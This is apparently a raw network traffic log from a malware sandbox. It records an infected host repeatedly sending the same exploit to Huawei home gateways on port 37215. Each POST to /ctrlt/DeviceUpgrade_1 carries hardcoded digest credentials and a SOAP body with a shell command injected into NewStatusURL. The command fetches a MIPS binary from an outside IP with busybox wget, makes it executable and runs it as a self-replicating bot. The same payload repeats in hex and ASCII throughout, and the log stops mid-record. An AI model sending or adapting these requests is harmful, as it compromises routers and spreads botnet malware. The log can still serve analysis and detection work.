                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1129192.168.2.2336678157.68.148.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299571991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1130192.168.2.2354850157.148.136.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299576044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1131192.168.2.2345664197.180.197.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299587965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1132192.168.2.2347876197.44.72.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299601078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1133192.168.2.2352378157.44.131.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299611092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1134192.168.2.2333164157.234.19.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299627066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1135192.168.2.2344582197.155.126.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299644947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1136192.168.2.235779241.201.11.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299647093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1137192.168.2.2344016157.129.207.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299663067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1138192.168.2.235237641.127.199.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299673080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1139192.168.2.235693625.227.69.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299681902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
